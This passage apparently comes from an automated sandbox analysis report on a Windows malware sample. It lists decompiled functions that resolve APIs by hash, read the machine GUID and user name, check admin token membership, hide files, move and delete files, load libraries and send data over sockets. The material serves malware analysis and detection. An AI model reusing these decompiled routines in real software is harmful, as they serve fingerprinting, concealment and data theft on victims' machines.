Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser_wmemset
String ID: CA
API String ID: 2078537776-1052703068
Opcode ID: 419fe300e58a3570bfcde902e2f1dd9873f4740fd797da306ae62043437d49c9
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: 419fe300e58a3570bfcde902e2f1dd9873f4740fd797da306ae62043437d49c9
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Uniqueness

Uniqueness Score: -1.00%

Function 0041284A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041284A(void* _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, int _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 2, 0xebb783d2, 0, 0);
				_t7 = SHRegSetPathW(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}

0x00412858
0x0041286c
0x0041286f

APIs

SHRegSetPathW.SHLWAPI(00000000,?,00000000,-80000001,00412D05,00000002,EBB783D2,00000000,00000000,5,A,00412D05,-80000001,00000000,5,A,00000000,00000000), ref: 0041286C

Strings

5,A, xrefs: 0041284A

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Path
String ID: 5,A
API String ID: 2875597873-3842761921
Opcode ID: 985f833e562fc410bf8876cb62ef75c9432edfe987e4e1d4c2e5d722ffee7efc
Instruction ID: e513a9aa1dc03f827004651369457c754081445531a40a51076ab4492d9af12d
Opcode Fuzzy Hash: 985f833e562fc410bf8876cb62ef75c9432edfe987e4e1d4c2e5d722ffee7efc
Instruction Fuzzy Hash: 48D0C93214020DBBDF026EC1DC02F9A3F2AAB48754F004014BB18280A1D6B3A630ABA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406086, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 9, 0xecae3497, 0, 0);
				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}

0x00406094
0x004060a8
0x004060ab

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Uniqueness

Uniqueness Score: -1.00%

Function 00402C03, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C03(struct HINSTANCE__* _a4, char _a8) {
				_Unknown_base(*)()* _t5;
				void* _t6;

				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
				_t1 =  &_a8; // 0x403173
				_t5 = GetProcAddress(_a4,  *_t1); // executed
				return _t5;
			}

0x00402c10
0x00402c15
0x00402c1b
0x00402c1e

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Uniqueness

Uniqueness Score: -1.00%

Function 00404A52, Relevance: 3.1, APIs: 2, Instructions: 63
registryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00404A52(void* _a4, char* _a8, char* _a12) {
				void* _v8;
				int _v12;
				void* __ebx;
				char* _t10;
				long _t13;
				char* _t27;

				_push(_t21);
				_t27 = E00402B7C(0x208);
				if(_t27 == 0) {
					L4:
					_t10 = 0;
				} else {
					E00402B4E(_t27, 0, 0x208);
					_v12 = 0x208;
					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
					if(_t13 != 0) {
						E00402BAB(_t27);
						goto L4;
					} else {
						E004031E5(0, 9, 0xfe9f661a, 0, 0);
						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
						E00404A39(_v8); // executed
						_t10 = _t27;
					}
				}
				return _t10;
			}

0x00404a56
0x00404a65
0x00404a6a
0x00404ad1
0x00404ad1
0x00404a6c
0x00404a71
0x00404a79
0x00404a85
0x00404a9a
0x00404a9e
0x00404acb
0x00000000
0x00404aa0
0x00404aac
0x00404abc
0x00404ac1
0x00404ac6
0x00404ac6
0x00404a9e
0x00404ad9

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNEL32(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: 314642708f6f99a387e50e3000fd39d705c8d8fb5f9471d97b64c20bee4c1500
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: 314642708f6f99a387e50e3000fd39d705c8d8fb5f9471d97b64c20bee4c1500
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Uniqueness

Uniqueness Score: -1.00%

Function 004060BD, Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E004060BD(void* __eflags) {
				signed int _v8;
				char _v12;
				short _v16;
				char _v20;
				void* __ebx;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t14;
				signed int _t15;
				void* _t24;

				_v16 = 0x500;
				_v20 = 0;
				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t13;
				if(_t13 != 0) {
					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t15;
					E0040604F(_v12);
					return _v8;
				}
				return _t13;
			}

0x004060c6
0x004060d5
0x004060d8
0x004060f4
0x004060f6
0x004060fb
0x0040610a
0x00406115
0x0040611c
0x0040611e
0x00406121
0x00000000
0x0040612a
0x0040612f

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Uniqueness

Uniqueness Score: -1.00%

Function 00404056, Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00404056(void* __ebx, intOrPtr _a4) {
				intOrPtr* _t5;
				void* _t6;
				void* _t14;

				_t14 = E00402B7C(0x208);
				if(_t14 == 0) {
					L4:
					return 0;
				}
				E00402B4E(_t14, 0, 0x208);
				_t5 = E004031E5(__ebx, 0xa, 0xc7f71852, 0, 0);
				_t6 =  *_t5(0, _a4, 0, 0, _t14); // executed
				if(_t6 != 0) {
					E00402BAB(_t14);
					goto L4;
				}
				return _t14;
			}

0x00404066
0x0040406b
0x004040a0
0x00000000
0x004040a0
0x00404072
0x00404083
0x0040408f
0x00404093
0x0040409a
0x00000000
0x0040409f
0x00000000

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,0000000A,C7F71852,00000000,00000000,00413CAD,0000001A,00000001), ref: 0040408F

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$AllocateFolderPathProcess
String ID:
API String ID: 398210565-0
Opcode ID: bed7d58df55cc9eee27823126afe87c7d495dae1a92b866dc25ce39e07057d59
Instruction ID: 7d0b33caadbb1370849e9dfd1ecad86b360ac2e9a1dca59c17201c727c4e1007
Opcode Fuzzy Hash: bed7d58df55cc9eee27823126afe87c7d495dae1a92b866dc25ce39e07057d59
Instruction Fuzzy Hash: 57E06D6260156136D23129A7AC09D6B6E7DCBD3FA5B00003FF708F52C1D96D990281BA

Uniqueness

Uniqueness Score: -1.00%

Function 00403C62, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
				void* _t3;
				int _t5;

				_t3 = E00403D4D(__eflags, _a4); // executed
				if(_t3 == 0) {
					__eflags = 0;
					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
					_t5 = CreateDirectoryW(_a4, 0); // executed
					return _t5;
				} else {
					return 1;
				}
			}

0x00403c68
0x00403c70
0x00403c78
0x00403c82
0x00403c8b
0x00403c8f
0x00403c72
0x00403c76
0x00403c76

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Uniqueness

Uniqueness Score: -1.00%

Function 0040642C, Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040642C(void* __eflags) {
				short _v40;
				intOrPtr* _t6;
				void* _t10;

				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
				 *_t6( &_v40); // executed
				return 0 | _v40 == 0x00000009;
			}

0x0040643c
0x00406445
0x00406454

APIs

GetNativeSystemInfo.KERNEL32(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Uniqueness

Uniqueness Score: -1.00%

Function 004044A7, Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044A7(WCHAR* _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				long _t9;
				void* _t10;

				E004031E5(_t10, 0, 0xf66be5a2, 0, 0);
				_t9 = GetPrivateProfileStringW(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				return _t9;
			}

0x004044b4
0x004044cb
0x004044ce

APIs

GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
Instruction ID: e6a1e737d40be81796f932fb1ea6dd5b05bd2579ff383e5fb5a00b3a8c54de51
Opcode Fuzzy Hash: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
Instruction Fuzzy Hash: 52D0C27604410DBFDF025EE1DC05CAB3F6EEB48354B408425BE2895021D637DA71ABA5

Uniqueness

Uniqueness Score: -1.00%

Function 004049B3, Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004049B3(void* _a4, WCHAR* _a8, WCHAR* _a12, DWORD* _a16, void* _a20, DWORD* _a24) {
				int _t8;
				void* _t9;

				E004031E5(_t9, 2, 0xdc1011d7, 0, 0);
				_t8 = SHGetValueW(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				return _t8;
			}

0x004049c1
0x004049d8
0x004049db

APIs

SHGetValueW.SHLWAPI(?,?,?,?,?,?,00000002,DC1011D7,00000000,00000000), ref: 004049D8

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
Instruction ID: 49132b90e07f175002bb52db16c83daeb6fc20f74050e769a3614ef6a11dfcc0
Opcode Fuzzy Hash: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
Instruction Fuzzy Hash: 71D0923214020DBBDF026ED1DC02FAA3F2AAB09758F104014FB18280A1C677D631AB95

Uniqueness

Uniqueness Score: -1.00%

Function 00404EEA, Relevance: 1.5, APIs: 1, Instructions: 16
networkCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;

				_t5 = _a12;
				if(_t5 == 0) {
					_t5 = E00405D0B(_a8) + 1;
				}
				__imp__#19(_a4, _a8, _t5, 0); // executed
				return _t5;
			}

0x00404eed
0x00404ef2
0x00404efd
0x00404efd
0x00404f07
0x00404f0e

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Uniqueness

Uniqueness Score: -1.00%

Function 004049DC, Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004049DC(void* _a4, int _a8, WCHAR* _a12, DWORD* _a16) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 2, 0xeca4834b, 0, 0);
				_t6 = SHEnumKeyExW(_a4, _a8, _a12, _a16); // executed
				return _t6;
			}

0x004049ea
0x004049fb
0x004049fe

APIs

SHEnumKeyExW.SHLWAPI(?,?,?,?,00000002,ECA4834B,00000000,00000000), ref: 004049FB

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
Instruction ID: fb20b8ae34c3d99b6a2ec1f59af3280c7c0bbdac25ffdbb9458fe1f208d0831b
Opcode Fuzzy Hash: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
Instruction Fuzzy Hash: 45D0023114430D7BEF115ED1DC06F597F1ABB49B54F104455BB18680E19673A6305755

Uniqueness

Uniqueness Score: -1.00%

Function 00403BD0, Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 0, 0xc9143177, 0, 0);
				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
				return _t6;
			}

0x00403bdd
0x00403beb
0x00403bee

APIs

MoveFileExW.KERNEL32(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Uniqueness

Uniqueness Score: -1.00%

Function 00404DF3, Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Uniqueness

Uniqueness Score: -1.00%

Function 0040427D, Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040427D(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
				return _t4;
			}

0x0040428a
0x00404297
0x0040429a

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Uniqueness

Uniqueness Score: -1.00%

Function 00404A19, Relevance: 1.5, APIs: 1, Instructions: 13
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404A19(void* _a4, short* _a8, void** _a12) {
				long _t5;
				void* _t6;

				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
				return _t5;
			}

0x00404a27
0x00404a35
0x00404a38

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Uniqueness

Uniqueness Score: -1.00%

Function 00403C08, Relevance: 1.5, APIs: 1, Instructions: 12
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C08(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
				_t4 = DeleteFileW(_a4); // executed
				return _t4;
			}

0x00403c15
0x00403c1d
0x00403c20

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Uniqueness

Uniqueness Score: -1.00%

Function 00402C1F, Relevance: 1.5, APIs: 1, Instructions: 12
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C1F(WCHAR* _a4) {
				struct HINSTANCE__* _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
				_t4 = LoadLibraryW(_a4); // executed
				return _t4;
			}

0x00402c2c
0x00402c34
0x00402c37

APIs

LoadLibraryW.KERNEL32(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Uniqueness

Uniqueness Score: -1.00%

Function 00408B2C, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408B2C(struct HINSTANCE__* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe0cf5891, 0, 0);
				_t4 = FreeLibrary(_a4); // executed
				return _t4;
			}

0x00408b39
0x00408b41
0x00408b44

APIs

FreeLibrary.KERNELBASE(?,00000000,E0CF5891,00000000,00000000), ref: 00408B41

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
Instruction ID: 291ca984118c00001a410e8fe814b9ebecee15bf7cc635df9db1cfcd8d33b31d
Opcode Fuzzy Hash: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
Instruction Fuzzy Hash: 0EB092B004820C3EAE002EF19C05C3B3E8DEA4454870044757E0CE5051EA36DE1110A5

Uniqueness

Uniqueness Score: -1.00%

Function 00403BEF, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BEF(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
				_t4 = FindClose(_a4); // executed
				return _t4;
			}

0x00403bfc
0x00403c04
0x00403c07

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Uniqueness

Uniqueness Score: -1.00%

Function 00403BB7, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BB7(WCHAR* _a4) {
				long _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xc6808176, 0, 0);
				_t4 = GetFileAttributesW(_a4); // executed
				return _t4;
			}

0x00403bc4
0x00403bcc
0x00403bcf

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
